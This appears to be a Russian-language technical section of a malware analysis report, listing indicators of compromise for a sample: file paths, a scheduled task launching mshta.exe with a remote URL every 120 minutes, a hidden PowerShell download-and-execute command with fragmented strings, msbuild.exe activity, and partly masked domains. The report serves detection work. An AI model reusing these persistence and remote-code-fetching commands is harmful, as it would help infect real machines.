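Техническая информация
Примечание: символы «#» в именах узлов, по-видимому, маскируют часть адреса, поэтому приведённые ниже домены — неполные индикаторы и для точного сопоставления не годятся. Список ниже идёт без подзаголовков и объединяет пути к файлам и заданию планировщика, командные строки процессов, сетевые соединения (узел:порт) и DNS-запросы. Для обнаружения наиболее показательны: задание планировщика «CDTcomeCU», запускающее mshta.exe с удалённым URL каждые 120 минут; скрытый запуск PowerShell с -ExecutionPolicy Bypass и строкой загрузки, разбитой на фрагменты; активность, связанная с msbuild.exe.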
- <SYSTEM32>\tasks\cdtcomecu
- '<SYSTEM32>\mshta.exe' HTTp://tn#.sh/MicrosoftCDT
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/1.txt...
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %TEMP%\datc51.tmp
- %WINDIR%.lnk
- %APPDATA%\microsoft\windows\templates\windows.lnk
- %TEMP%\datc51.tmp
- 'tn#.sh':80
- 'tn#.sh':443
- 'dr########3.hospedagemdesites.ws':80
- 'la####a.hopto.org':5155
- http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/0.mp3
- DNS ASK tn#.sh
- DNS ASK dr########3.hospedagemdesites.ws
- DNS ASK st####.rapidssl.com
- DNS ASK la####a.hopto.org
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 120 /tn "CDTcomeCU" /tr "\"<SYSTEM32>\mshta.exe\"http://ho###nuve.com/erro.crt" /F
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'